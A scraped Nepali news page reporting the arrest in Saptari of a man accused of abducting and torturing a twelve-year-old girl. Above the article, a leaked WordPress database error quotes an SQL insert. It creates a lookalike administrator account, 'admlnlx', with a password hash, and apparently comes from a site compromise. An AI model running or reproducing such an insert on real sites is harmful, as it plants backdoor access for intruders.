WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4VwuQKftYl/z.9qHkak4bBo8nnFug/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 15:10:53', '', 'admlnlx', 'admlnlx')
सप्तरी, पुस ७ –
बाह्र वर्षीया एक बालिकालाई अपहरणपछि बन्धक बनाएको आरोपमा सप्तरीको शम्भुनाथ नगरपालिका–६ बस्ने २८ वर्षीय रुदल सदालाई आज प्रहरीले पक्राउ गरेको छ ।
अपहरण गरी पीडित बालिकालाई यातना दिएको उजुरीका आधारमा प्रहरीले सदालाई पक्राउ गरी मानव बेचबिखन तथा ओसारपसारविरुद्धको मुदा दर्ता गरेको जनाएको छ ।
पीडित बालिकाकी आमाको निवेदनका आधारमा आरोपितलाई गिरफ्तार गरिएको जिल्ला प्रहरी कार्यालय, सप्तरी प्रहरीले जनाएको छ ।
पक्राउ परेका सदाले पीडित बालिकालाई २०७३ भदौ १९ गते घरबाट झुक्याई अपहरण गरी भारदह, त्रिकोल हुँदै भारत विहारको कुनोलीमा स्थान परिवर्तन गर्दै तीन महिना बढी बन्धक बनाई राखेको पीडितले प्रहरीमा जानकारी दिएको छ ।
आरोपितको नियन्त्रणबाट उम्केर गत मङ्सिर २५ गते पीडित बालिका घरपरिवारको सम्पर्कमा आएपछि उनकी आमाले जिल्ला प्रहरी कार्यालयमा उजुरी दिएको बताइएको छ । – रासस